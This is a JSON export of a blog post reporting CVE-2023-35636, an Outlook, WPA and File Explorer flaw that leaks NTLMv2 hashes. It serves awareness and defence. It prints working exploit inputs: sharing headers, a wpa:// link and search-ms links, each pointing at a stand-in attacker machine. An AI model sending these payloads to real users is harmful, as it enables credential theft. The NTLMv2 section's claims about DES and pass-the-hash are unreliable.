{"id":1895,"date":"2024-02-01T10:47:33","date_gmt":"2024-02-01T10:47:33","guid":{"rendered":"https:\/\/aqqute.com\/blog\/?p=1895"},"modified":"2024-02-01T10:47:33","modified_gmt":"2024-02-01T10:47:33","slug":"new-outlook-flaw-let-attackers-access-hashed-passwords","status":"publish","type":"post","link":"https:\/\/aqqute.com\/blog\/2024\/02\/01\/new-outlook-flaw-let-attackers-access-hashed-passwords\/","title":{"rendered":"New Outlook Flaw Let Attackers Access Hashed Passwords"},"content":{"rendered":"<p><b>New Outlook Flaw Let Attackers Access Hashed Passwords<\/b><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1896\" src=\"https:\/\/aqqute.wordpress.com\/wp-content\/uploads\/2024\/03\/eadd7-screenshot_20240123_084915_chrome-idorenyin.jpg?w=300&#038;h=175\" alt=\"\" width=\"300\" height=\"175\" \/><\/p>\n<p><span style=\"font-weight: 400\">A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified.<\/span><\/p>\n<p><span style=\"font-weight: 400\">This vulnerability has been assigned CVE-2023-35636 and a severity rating of 6.5 (Medium).<\/span><\/p>\n<p><span style=\"font-weight: 400\">This vulnerability was reported to Microsoft in July 2023, and Microsoft responded by patching WPA and File Explorer, rating the issue \u201cModerate Severity.\u201d<\/span><\/p>\n<p><span style=\"font-weight: 400\">Microsoft fully patched this vulnerability in December 2023. However, unpatched systems remain exposed to exploitation and theft of hashed passwords.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Outlook Flaw \u2013 CVE-2023-35636<\/span><\/p>\n<p><span style=\"font-weight: 400\">This vulnerability abuses the calendar-sharing function in Outlook: when two additional headers are added to an email, Outlook can be directed to connect to an external machine to exchange the sharing content. 
This connection can then be used to intercept the NTLMv2 hash.<\/span><\/p>\n<p><span style=\"font-weight: 400\">If an attacker succeeds in extracting NTLMv2 hashes, two methods of attack are possible: offline brute-force attacks, which can reveal the original password, and authentication relay attacks, in which the attacker uses the NTLMv2 hash to manipulate an authentication request to a server and authenticate to that server as the victim.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Leaking NTLMv2 hashes using Outlook<\/span><\/p>\n<p><span style=\"font-weight: 400\">Outlook serves as the email and calendar tool for the Microsoft 365 suite, which is used by millions of people and organizations worldwide.<\/span><\/p>\n<p><span style=\"font-weight: 400\">One of its prime features is the sharing of calendars between users, which can be abused to trigger an authentication attempt that redirects the hashed password to the attacker\u2019s server.<\/span><\/p>\n<p><span style=\"font-weight: 400\">The headers used for exploitation are:<\/span><\/p>\n<p><span style=\"font-weight: 400\">\u201cContent-Class\u201d = \u201cSharing\u201d \u2014 tells Outlook that this email contains sharing content.<\/span><\/p>\n<p><span style=\"font-weight: 400\">\u201cx-sharing-config-url\u201d = \\\\(Attacker machine)\\a.ics \u2014 points the victim\u2019s Outlook to the attacker\u2019s machine.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Leaking NTLMv2 Hashes using URI Handlers<\/span><\/p>\n<p><span style=\"font-weight: 400\">Windows Performance Analyzer (WPA), a default feature in Windows, registers a URI handler for WPA:\/\/ by default, which lets the program launch automatically when a user clicks a WPA-related link.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Moreover, this feature uses NTLMv2 hashes for 
authentication over the open web. This makes it vulnerable to relay and offline brute-force attacks.<\/span><\/p>\n<p><span style=\"font-weight: 400\">To exploit WPA, the threat actor sends a payload made up of three parts.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Full payload:<\/span><\/p>\n<p><span style=\"font-weight: 400\">wpa:\/\/\/\/&lt;attacker IP&gt;\/bla<\/span><\/p>\n<p><span style=\"font-weight: 400\">wpa:\/\/ \u2014 tells the operating system that this link should open in WPA.<\/span><\/p>\n<p><span style=\"font-weight: 400\">\/\/&lt;attacker IP&gt; \u2014 tells the victim\u2019s machine to access the attacker\u2019s machine via SMB.<\/span><\/p>\n<p><span style=\"font-weight: 400\">\/bla \u2014 tells the victim\u2019s machine which file to access.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Leaking NTLMv2 Hashes using Windows File Explorer<\/span><\/p>\n<p><span style=\"font-weight: 400\">The URI handler \u201csearch-ms\u201d activates the search feature of explorer.exe and points the explorer.exe process to the web. explorer.exe is one of the most powerful processes in the Windows operating system: it can browse files and folders, copy and move files, and create and delete folders.<\/span><\/p>\n<p><span style=\"font-weight: 400\">As part of the exploitation, two parameters were identified in Microsoft\u2019s documentation: \u201csubquery\u201d and \u201ccrumb\u201d. 
For exploitation with the \u201csubquery\u201d parameter, the following payload can be used:<\/span><\/p>\n<p><i><span style=\"font-weight: 400\">search-ms:\/\/query=poc&amp;subquery=\\\\(Attacker machine)\\poc.search-ms<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">search-ms:\/\/ \u2013 tells the operating system that this link should open in explorer.exe.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">query=poc \u2013 fake search query.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">&amp;subquery=\\\\(Attacker machine)\\poc.search-ms \u2014 path to the .search-ms file.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">For exploitation with the \u201ccrumb\u201d parameter, the following payload can be used:<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">search-ms:\/\/query=poc&amp;crumb=location:\\\\(Attacker machine)<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">search-ms:\/\/ \u2013 tells the operating system that this link should open in explorer.exe.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">query=poc \u2013 fake search query.<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400\">crumb=location:\\\\(Attacker machine) <\/span><\/i><span style=\"font-weight: 400\">\u2014 the location property under the crumb parameter lets the user specify a path for the search.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Furthermore, a complete report has been published, providing detailed information about the attack scenarios, exploitation methods, etc.<\/span><\/p>\n<p><b>What is NTLMv2?<\/b><\/p>\n<p><span style=\"font-weight: 400\">NTLMv2 (NT LAN Manager version 2) is a protocol used by Windows operating systems for authentication and authorization purposes. 
However, NTLMv2 can also be exploited by attackers to gain unauthorized access to a system, steal credentials, and perform other malicious activities.<\/span><\/p>\n<p><b>Key features of NTLMv2<\/b><\/p>\n<p><span style=\"font-weight: 400\">Authentication Protocol: NTLMv2 is primarily used for authentication between clients and servers in a Windows network environment. It is commonly employed in scenarios such as user logins and access to shared resources.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Challenge-Response Mechanism: NTLMv2 uses a challenge-response mechanism for authentication. When a client attempts to access a server, the server sends a random challenge to the client. The client then encrypts this challenge using its password and other information and sends the encrypted response back to the server.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Hashing and Encryption: NTLMv2 relies on cryptographic techniques for securing authentication data. It uses HMAC-MD5 (Hash-based Message Authentication Code with the MD5 hash function) for integrity checking and DES (Data Encryption Standard) for encryption.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Enhanced Security: NTLMv2 includes improvements over the original NTLM protocol to enhance security. It addresses weaknesses such as the susceptibility to certain types of attacks, including replay attacks, which were more of a concern in the earlier version.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Compatibility: NTLMv2 is backward-compatible with the original NTLM protocol, allowing systems to support both versions during a transitional period. 
However, the use of NTLMv2 is generally recommended for better security.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Domain Authentication: NTLMv2 is often used in Windows domain environments, where it plays a role in authenticating users and computers within the domain.<\/span><\/p>\n<p><b>How to exploit NTLMv2<\/b><\/p>\n<p><span style=\"font-weight: 400\">One common way to exploit the NTLMv2 vulnerability is through a technique called a \u201cpass-the-hash\u201d attack. In this attack, an attacker intercepts the NTLMv2 hash of a user\u2019s password, which is stored in the system\u2019s memory, and uses it to authenticate as the user without knowing their actual password. This allows the attacker to gain access to sensitive resources, such as files and databases, and perform unauthorized actions.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Another way to exploit the NTLMv2 vulnerability is through a \u201creplay\u201d attack, in which an attacker intercepts the NTLMv2 authentication messages exchanged between a client and a server and replays them to gain unauthorized access to the system.<\/span><\/p>\n<p><span style=\"font-weight: 400\">To mitigate the NTLMv2 vulnerability, it is recommended to implement strong password policies, such as enforcing complex passwords and regular password changes. Additionally, using multi-factor authentication and implementing security controls such as firewalls and intrusion detection systems can help prevent and detect attacks exploiting the NTLMv2 vulnerability. 
Finally, it is important to keep the operating system and other software up-to-date with the latest security patches to minimize the risk of exploitation.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Outlook Flaw Let Attackers Access Hashed Passwords A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified. This vulnerability has been assigned with CVE-2023-35636, and the severity has been given as 6.5 (Medium). This vulnerability was reported to &hellip;<\/p>\n","protected":false},"author":1,"featured_media":1896,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1895","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-business"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts\/1895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/comments?post=1895"}],"version-history":[{"count":0,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts\/1895\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/media?parent=1895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/categories?post=1895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/tags?post=1895"}],"curies":[{"name":"wp","href":"https:\/\/api
.w.org\/{rel}","templated":true}]}}